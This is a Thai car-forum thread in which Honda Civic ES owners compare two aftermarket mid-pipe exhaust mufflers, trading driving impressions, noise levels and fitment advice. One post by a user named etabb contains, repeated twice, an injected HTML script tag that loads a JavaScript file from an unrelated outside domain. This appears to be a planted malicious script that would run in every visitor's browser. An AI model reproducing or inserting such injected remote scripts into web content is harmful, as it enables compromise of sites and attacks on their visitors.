ตอบ
M_@nd_M


เข้าร่วม: 01 ตุลา 2008
ตอบ: 89

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 61
ให้คำขอบคุณ: 13

ที่อยู่: กทม.
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 17 มีนา 2011 22:07 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
พักกลางของ 2 ค่ายนี้ ของใครประสิทธิภาพดีกว่ากันครับ ในราคา 2,500 เท่ากัน
คร่าวๆก็คือ เพิ่มแรงบิดมาไวในรอบต่ำเหมือนกัน
มีใครเคยลองอันไหนบ้าง เล่าสู่กันฟังหน่อยครับ


ท่อพักกลางใบพัดอัดอากาศ หลำเฮดเดอร์
ท่อพักกลางใบพัดอัดอากาศ หลำเฮดเดอร์
banana booster ของ ENGINEERING TEC
banana booster ของ ENGINEERING TEC
ได้รับคำขอบคุณจาก: kamoman16  zan  tummytummy  P.TER.357  maxch  Favonius  curran  aun99  cherd  BeL  hikaru_kung  BEER_CIVIC ES  Phetcharat 
saw


ชื่อเล่น: ซอ เพชรบุร

เข้าร่วม: 24 มกรา 2009
ตอบ: 2873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2127
ให้คำขอบคุณ: 2684

ที่อยู่: บ้านลาด เพชรบุรี รับพาเสียวทั่วเพชรบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 17 มีนา 2011 22:15 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
รอข้อมูล
ได้รับคำขอบคุณจาก: kamoman16  cherd 
maxspeed


เข้าร่วม: 20 กันยา 2010
ตอบ: 176

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 146
ให้คำขอบคุณ: 493

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 17 มีนา 2011 22:32 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
อยากรู้ๆ
ได้รับคำขอบคุณจาก: kamoman16  cherd 
SONG1199


ชื่อเล่น: สอง

เข้าร่วม: 17 กันยา 2010
ตอบ: 437

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 391
ให้คำขอบคุณ: 222

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 17 มีนา 2011 23:35 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
แบบใบพัดอัดอากาศเคยใช้แล้ว

ตอนนี้ใส่ของเดิม ครับ แรงๆๆ
ได้รับคำขอบคุณจาก: _Non_  zan  maxch  curran  cherd 
olunlatitle


ชื่อเล่น: เติ้ล

เข้าร่วม: 17 มิถุนา 2009
ตอบ: 690

Guru ES
Guru ES

ได้รับคำขอบคุณ: 557
ให้คำขอบคุณ: 343

ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
ศุกร์, 18 มีนา 2011 00:52 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
kamoman16 พิมพ์ว่า:
แบบใบพัดอัดอากาศเคยใช้แล้ว

ตอนนี้ใส่ของเดิม ครับ แรงๆๆ


ช่ายเลย
ได้รับคำขอบคุณจาก: _Non_  kamoman16  curran  cherd 
_Non_


เข้าร่วม: 06 กรกฎา 2009
ตอบ: 220

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 181
ให้คำขอบคุณ: 300

ปี: 2004
ศุกร์, 18 มีนา 2011 01:38 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
ตกลงหลำดีกว่าหลือไงคับ
olunlatitle พิมพ์ว่า:
kamoman16 พิมพ์ว่า:
แบบใบพัดอัดอากาศเคยใช้แล้ว

ตอนนี้ใส่ของเดิม ครับ แรงๆๆ


ช่ายเลย



ตกลงหลำดีกว่าหลือไงคับจะได้จัดมั้งคับ
ได้รับคำขอบคุณจาก: cherd 
SONG1199


ชื่อเล่น: สอง

เข้าร่วม: 17 กันยา 2010
ตอบ: 437

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 391
ให้คำขอบคุณ: 222

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 18 มีนา 2011 02:43 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
_Non_ พิมพ์ว่า:
ตกลงหลำดีกว่าหลือไงคับ
olunlatitle พิมพ์ว่า:
kamoman16 พิมพ์ว่า:
แบบใบพัดอัดอากาศเคยใช้แล้ว

ตอนนี้ใส่ของเดิม ครับ แรงๆๆ


ช่ายเลย



ตกลงหลำดีกว่าหลือไงคับจะได้จัดมั้งคับ



เดิมๆ ดีที่สุด ครับ เชื่อผม

สูงสุด คืนสู่ สามัญ
ได้รับคำขอบคุณจาก: hacker  kittidech  curran  cherd  Phetcharat 
pongz19


ชื่อเล่น: โป้ง

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1168

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 859
ให้คำขอบคุณ: 489

ที่อยู่: ประชาอุทิศ
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 18 มีนา 2011 09:05 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
ใส่ของเฮียหลำอยู่ครับ เข้าไปคุยครั้งแรกแกพลังโม้เยอะหน่อยเลยไม่ทำ ครั้งที่สองเข้าไปอีกแบบว่าอยากลองของว่าของแกดีจริงมั้ย
เอารถให้ลูกน้องแกทำแค่ 15 นาทีเสร็จ งานโอเค หลังจากนั้นก็ออกมาลองขับลูกชายแกก็นั่งมาด้วย ผมก็ขับปกติลองจับความรู้สึกดู ก็ไม่รู้สึกอะไรเท่าไหร่ เลยกดดูก็มาเท่าเดิม เริ่มใจไม่ดีละเสียตังค์ฟรีป่าววะกู ลูกชายแกก็บอกว่าพี่ใช้ไปสักวัน 2 วันก่อน ให้กล่่องมันจำ ผมก็โอเคมันอาจมีส่วน วันที่ 2 มีโอกาสซัดยาวๆ อาการพุ่งเริ่มมา รอบไวกว่าเดิม เกียร์ขึ้นไว รถผม auto นะ เกียร์ 2 ลากไปแป๊ปเดียวขึ้นเกียร์ 3 ละ ขับมันขึ้นนะครับ แต่...สำหรับผมหลังๆมันไม่เหมือนเดิมนะ ผมติดมาตั้งแต่ต้นปี เดี๋ยวนี้ไม่ค่อยปรู๊ดปร๊าดเหมือนตอนติดมาใหม่ๆ แต่ก็ไม่แย่ลงไปกว่าพักกลางเดิม ก็ไม่รู้ทำไมเหมือนกัน ก่อนหน้านี้รถผมไอเสียทำมาแค่เปลี่ยนปลายมูเก้น ถ้าใครจะเปลี่ยนพักกลางตัวนี้ท่อจะดังขึ้นกว่าเดิมนะครับ ทั้งหมดนี้ความรู้สึกส่วนตัวล้วนๆนะครับ คันอื่นถ้าไปใส่ผมไ่ม่ใจว่าจะรู้สึกเหมือนกันรึป่าวเพราะถ้ารถจะวิ่งดีขึ้นมันก็มีหลายปัจจัยเหมือนกัน
ได้รับคำขอบคุณจาก: Tinkky  P.TER.357  maxch  Favonius  curran  Nut_Au_Together    saw  boyboom_16  okuma  Saka  aun99  cherd  note_okaasan  yoyosonic 
tummytummy


ชื่อเล่น: ตั้ม

เข้าร่วม: 07 สิงหา 2010
ตอบ: 136

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 108
ให้คำขอบคุณ: 220

ที่อยู่: พัฒนาการ40
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 18 มีนา 2011 09:31 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
รอเก็บข้อมูลคับ
ได้รับคำขอบคุณจาก: cherd 
bank


เข้าร่วม: 06 ตุลา 2010
ตอบ: 2269

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 918
ให้คำขอบคุณ: 5506

ที่อยู่: ก ท ม
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 18 มีนา 2011 09:33 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
มาหาข้อมูล
ได้รับคำขอบคุณจาก: cherd 
mark_es03


ชื่อเล่น: มาร์คกี้

เข้าร่วม: 01 กันยา 2010
ตอบ: 2301

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1422
ให้คำขอบคุณ: 2183

ที่อยู่: สิบทิศเซอร์วิส
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 18 มีนา 2011 09:41 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
ได้รับคำขอบคุณจาก: cherd 
sevenartz


ชื่อเล่น: อาร์ท

เข้าร่วม: 17 มีนา 2010
ตอบ: 1321

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2847
ให้คำขอบคุณ: 20

ที่อยู่: Hell
ปี: 2001
สี: น้ำเงิน วิวิด (มุก) (B-502P)
ศุกร์, 18 มีนา 2011 11:02 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
pongz19 พิมพ์ว่า:
ใส่ของเฮียหลำอยู่ครับ เข้าไปคุยครั้งแรกแกพลังโม้เยอะหน่อยเลยไม่ทำ ครั้งที่สองเข้าไปอีกแบบว่าอยากลองของว่าของแกดีจริงมั้ย
เอารถให้ลูกน้องแกทำแค่ 15 นาทีเสร็จ งานโอเค หลังจากนั้นก็ออกมาลองขับลูกชายแกก็นั่งมาด้วย ผมก็ขับปกติลองจับความรู้สึกดู ก็ไม่รู้สึกอะไรเท่าไหร่ เลยกดดูก็มาเท่าเดิม เริ่มใจไม่ดีละเสียตังค์ฟรีป่าววะกู ลูกชายแกก็บอกว่าพี่ใช้ไปสักวัน 2 วันก่อน ให้กล่่องมันจำ ผมก็โอเคมันอาจมีส่วน วันที่ 2 มีโอกาสซัดยาวๆ อาการพุ่งเริ่มมา รอบไวกว่าเดิม เกียร์ขึ้นไว รถผม auto นะ เกียร์ 2 ลากไปแป๊ปเดียวขึ้นเกียร์ 3 ละ ขับมันขึ้นนะครับ แต่...สำหรับผมหลังๆมันไม่เหมือนเดิมนะ ผมติดมาตั้งแต่ต้นปี เดี๋ยวนี้ไม่ค่อยปรู๊ดปร๊าดเหมือนตอนติดมาใหม่ๆ แต่ก็ไม่แย่ลงไปกว่าพักกลางเดิม ก็ไม่รู้ทำไมเหมือนกัน ก่อนหน้านี้รถผมไอเสียทำมาแค่เปลี่ยนปลายมูเก้น ถ้าใครจะเปลี่ยนพักกลางตัวนี้ท่อจะดังขึ้นกว่าเดิมนะครับ ทั้งหมดนี้ความรู้สึกส่วนตัวล้วนๆนะครับ คันอื่นถ้าไปใส่ผมไ่ม่ใจว่าจะรู้สึกเหมือนกันรึป่าวเพราะถ้ารถจะวิ่งดีขึ้นมันก็มีหลายปัจจัยเหมือนกัน



... อ่า ได้ข้อมูลชัดเลย ผมก็เคยคิดจะเข้านะร้านนี้

หาข้อมูลคนในเนทเค้าวิจารณ์กัน ส่วนมากเค้าก็ว่าดี

ผมก็ออโต้ ตอนนี้ใส่หม้อปลายไส้ตรง เสียงก็ดัง กลัวว่าเจอเจ้าตัวนี้มันจะดังเพิ่มรึปล่าว 555
ได้รับคำขอบคุณจาก: cherd 
kimberpro


ชื่อเล่น: เอ

เข้าร่วม: 22 ตุลา 2009
ตอบ: 1344

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1093
ให้คำขอบคุณ: 629

ที่อยู่: นวมินทร์
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 18 มีนา 2011 11:07 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
มาเก็บข้อมูล แต่ตอนนี้ผมไม่มีพักกลาง ปลายมูเก้นแท้ ก็ว่าดีนะ
ได้รับคำขอบคุณจาก: cherd 
civic2004


เข้าร่วม: 25 มิถุนา 2010
ตอบ: 142

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 303
ให้คำขอบคุณ: 1
ศุกร์, 18 มีนา 2011 11:08 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
ผมเคยใช้ของหลำครับ ท่อใบพัดจะเหมะกับพักปลายเดิมติดรถนะครับ ม้ามาไวดีไม่ต้องรอรอบมาก ขับสนุกครับ แต่ตอนนี้ผมเอาท่อใบพัดออกแล้วเนื่องจากเปลี่ยนพักปลายมูเก้น แล้วมันไปกันไม่ได้เลยครับต้นหายกลางอืดปลายไม่ใหล ปัจจุบันเลยเอาท่อพักกลางเดิมมาใส่คู่กับพักปลายมูเก้น ความแรงกลับมาอีกครั้งครับ ส่วนเสียงก็เงียบสงบไปเลย แต่ถ้าต้องการใส่ท่อใบพัด+พักปลายแต่งคงต้องพึ่งเฮดเดอร์ช่วยครับ แต่ก็จะเปลืองน้ำมันขึ้นครับ
ได้รับคำขอบคุณจาก: curran  boyboom_16  aun99  cherd  yoyosonic 
maxch


เข้าร่วม: 13 สิงหา 2009
ตอบ: 2190

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1513
ให้คำขอบคุณ: 2530

ที่อยู่: อยุธยา-สระบุรี
ปี: 2003
ศุกร์, 18 มีนา 2011 11:15 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
เก็บข้อมูล
ได้รับคำขอบคุณจาก: cherd 
book05


เข้าร่วม: 20 มิถุนา 2010
ตอบ: 637

Guru ES
Guru ES

ได้รับคำขอบคุณ: 407
ให้คำขอบคุณ: 419

ที่อยู่: 84 ซ.นนทบุรี24/3 ถ.สนามบินน้ำ จ.นนทบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 18 มีนา 2011 11:43 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
ใช้ท่อพักกลางใบพัดอัดอากาศ หลำเฮดเดอร์ ก็ดีกว่าของเดิม มาไวกว่าเดิมงับ ติดมา 6-7เดือน ได้มั่ง ก็ยังใช้ได้ดีอยู่นะครับ
ได้รับคำขอบคุณจาก: cherd 
curran


ชื่อเล่น: บี

เข้าร่วม: 07 กันยา 2009
ตอบ: 4300

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2057
ให้คำขอบคุณ: 5484

ที่อยู่: Samutprakarn
ปี: 2001
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 18 มีนา 2011 11:45 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
น่าสนใจเหมือนกันครับ แต่กัวไม่เวิค อิอิ
ได้รับคำขอบคุณจาก: cherd 
etabb


ชื่อเล่น: อีตาบีบี

เข้าร่วม: 02 เมษา 2010
ตอบ: 797

Guru ES
Guru ES

ได้รับคำขอบคุณ: 2637
ให้คำขอบคุณ: 1611

ที่อยู่: ลาดพร้าว
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 18 มีนา 2011 12:01 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
รอความคิดเห็นอื่นๆ อีกครับบ
ได้รับคำขอบคุณจาก: cherd 
etabb


ชื่อเล่น: อีตาบีบี

เข้าร่วม: 02 เมษา 2010
ตอบ: 797

Guru ES
Guru ES

ได้รับคำขอบคุณ: 2637
ให้คำขอบคุณ: 1611

ที่อยู่: ลาดพร้าว
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 18 มีนา 2011 12:02 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
อยากรู้ว่าแบบไหนจาดีที่สุดดด "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: cherd 
nakaporn


ชื่อเล่น: ต้น

เข้าร่วม: 24 มิถุนา 2009
ตอบ: 295

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 912
ให้คำขอบคุณ: 0

ที่อยู่: แพรกษาใหม่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 18 มีนา 2011 15:38 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
pongz19 พิมพ์ว่า:
ใส่ของเฮียหลำอยู่ครับ เข้าไปคุยครั้งแรกแกพลังโม้เยอะหน่อยเลยไม่ทำ ครั้งที่สองเข้าไปอีกแบบว่าอยากลองของว่าของแกดีจริงมั้ย
เอารถให้ลูกน้องแกทำแค่ 15 นาทีเสร็จ งานโอเค หลังจากนั้นก็ออกมาลองขับลูกชายแกก็นั่งมาด้วย ผมก็ขับปกติลองจับความรู้สึกดู ก็ไม่รู้สึกอะไรเท่าไหร่ เลยกดดูก็มาเท่าเดิม เริ่มใจไม่ดีละเสียตังค์ฟรีป่าววะกู ลูกชายแกก็บอกว่าพี่ใช้ไปสักวัน 2 วันก่อน ให้กล่่องมันจำ ผมก็โอเคมันอาจมีส่วน วันที่ 2 มีโอกาสซัดยาวๆ อาการพุ่งเริ่มมา รอบไวกว่าเดิม เกียร์ขึ้นไว รถผม auto นะ เกียร์ 2 ลากไปแป๊ปเดียวขึ้นเกียร์ 3 ละ ขับมันขึ้นนะครับ แต่...สำหรับผมหลังๆมันไม่เหมือนเดิมนะ ผมติดมาตั้งแต่ต้นปี เดี๋ยวนี้ไม่ค่อยปรู๊ดปร๊าดเหมือนตอนติดมาใหม่ๆ แต่ก็ไม่แย่ลงไปกว่าพักกลางเดิม ก็ไม่รู้ทำไมเหมือนกัน ก่อนหน้านี้รถผมไอเสียทำมาแค่เปลี่ยนปลายมูเก้น ถ้าใครจะเปลี่ยนพักกลางตัวนี้ท่อจะดังขึ้นกว่าเดิมนะครับ ทั้งหมดนี้ความรู้สึกส่วนตัวล้วนๆนะครับ คันอื่นถ้าไปใส่ผมไ่ม่ใจว่าจะรู้สึกเหมือนกันรึป่าวเพราะถ้ารถจะวิ่งดีขึ้นมันก็มีหลายปัจจัยเหมือนกัน



civic2004 พิมพ์ว่า:
ผมเคยใช้ของหลำครับ ท่อใบพัดจะเหมะกับพักปลายเดิมติดรถนะครับ ม้ามาไวดีไม่ต้องรอรอบมาก ขับสนุกครับ แต่ตอนนี้ผมเอาท่อใบพัดออกแล้วเนื่องจากเปลี่ยนพักปลายมูเก้น แล้วมันไปกันไม่ได้เลยครับต้นหายกลางอืดปลายไม่ใหล ปัจจุบันเลยเอาท่อพักกลางเดิมมาใส่คู่กับพักปลายมูเก้น ความแรงกลับมาอีกครั้งครับ ส่วนเสียงก็เงียบสงบไปเลย แต่ถ้าต้องการใส่ท่อใบพัด+พักปลายแต่งคงต้องพึ่งเฮดเดอร์ช่วยครับ แต่ก็จะเปลืองน้ำมันขึ้นครับ


เคยมาเหมือนกันครับ ปลายมูเ้ก้นแท้ตอนแรกอ่านในweb มาเยอเหมือนกันไปติดมา ต้น กลาง ปลาย หายหมดโทรไปที่ร้านบอกว่าให้เข้าไปแก้งานคุยกับเฮียแปบเดียวแกบอกว่าคนเดิมใช่ใหมผมก็งง แกบอกว่าก็บอกให้ไปแก้ระบบแก็สก่อนไง สุดท้ายแกบอกให้ลูกน้องใส่ของเดิมใส้ตรงให้คืน แล้วก็คืนเงินให้ สรุปว่าตอนที่ผมไปใส่นั้นน่าจะมี ES ดำไปใส่มาแล้วเหมือนกันแล้วก็มีปัญหาเดียวกันจึงทำให้เฮียแกไม่พอใจ สุดท้ายก็ได้เงินคืนครับ
ได้รับคำขอบคุณจาก: cherd 
M_@nd_M


เข้าร่วม: 01 ตุลา 2008
ตอบ: 89

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 61
ให้คำขอบคุณ: 13

ที่อยู่: กทม.
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 19 มีนา 2011 10:24 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
แล้วงานพี่ก้องมีใครเคยติดแล้วบ้างครับ
ได้รับคำขอบคุณจาก: cherd 
WIT_ES MANIA


เข้าร่วม: 01 ตุลา 2008
ตอบ: 865

Guru ES
Guru ES

ได้รับคำขอบคุณ: 887
ให้คำขอบคุณ: 327

ที่อยู่: ตลาดป่าโมก จ.อ่างทอง
เสาร์, 19 มีนา 2011 20:53 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
M_@nd_M พิมพ์ว่า:
แล้วงานพี่ก้องมีใครเคยติดแล้วบ้างครับ



อดีตลูกชายผมครับ แต่ใส่กับเครื่อง B16+B20 อาการคือเสียงท่อเงียบขึ้น ต้นมาไว กลางพอได้ครับ

พอใจในระดับนึงครับ
ได้รับคำขอบคุณจาก: okuma  cherd 
bbb@es


เข้าร่วม: 14 ธันวา 2008
ตอบ: 993

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1161
ให้คำขอบคุณ: 48

ที่อยู่: ดอนเมือง-รังสิตคับ
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 21 มีนา 2011 04:41 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
สำหรับผมพักกลางราคา2500เอาตังไปซื้อหม้อพักหลังยุ่นๆไส้ย้อนสวยๆซักใบดีกว่าคับพักกลางหน่ะเอาเปนไส้ตรงๆมีไว้ซับเสียงกะไว้อั้นไม่ให้ไอเสียออกไปเร็วกว่าปกติก็วิ่งดีแล้วอ่ะคับเครื่องเดิมแค่เปลี่ยนท่ออย่างเดียวอย่างอื่นไม่ได้ทำอะไรมันไม่แรงขึ้นมากขนาดเหนได้ชัดๆหรอกคับบางทีเปลี่ยนท่อแล้วมันดังขึ้นเราเหมือนจะรู้สึกว่ารถมันแรงขึ้นจริงอาจวิ่งถอยกว่าเดิมก็เปนได้นะคับ ปล.หม้อพักกลางรถผมทำมาจากถังดักไอที่เหลือๆทิ้งในอู่เอามาใส่ก็วิ่งดีแล้วอ่ะคับ
ได้รับคำขอบคุณจาก: aun99  adisak  aeae..  cherd  hikaru_kung  yoyosonic 
adisak


ชื่อเล่น: ปอง

เข้าร่วม: 06 พฤศจิกา 2008
ตอบ: 1675

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 649
ให้คำขอบคุณ: 1327

ที่อยู่: SCG.CEMENT
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 21 มีนา 2011 09:13 - เปรียบมวย ENGINEERING TEC VS หลำ เฮดเดอร์
bbb@es พิมพ์ว่า:
สำหรับผมพักกลางราคา2500เอาตังไปซื้อหม้อพักหลังยุ่นๆไส้ย้อนสวยๆซักใบดีกว่าคับพักกลางหน่ะเอาเปนไส้ตรงๆมีไว้ซับเสียงกะไว้อั้นไม่ให้ไอเสียออกไปเร็วกว่าปกติก็วิ่งดีแล้วอ่ะคับเครื่องเดิมแค่เปลี่ยนท่ออย่างเดียวอย่างอื่นไม่ได้ทำอะไรมันไม่แรงขึ้นมากขนาดเหนได้ชัดๆหรอกคับบางทีเปลี่ยนท่อแล้วมันดังขึ้นเราเหมือนจะรู้สึกว่ารถมันแรงขึ้นจริงอาจวิ่งถอยกว่าเดิมก็เปนได้นะคับ ปล.หม้อพักกลางรถผมทำมาจากถังดักไอที่เหลือๆทิ้งในอู่เอามาใส่ก็วิ่งดีแล้วอ่ะคับ


แหล่มมากคับพี่บี
ได้รับคำขอบคุณจาก: cherd 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.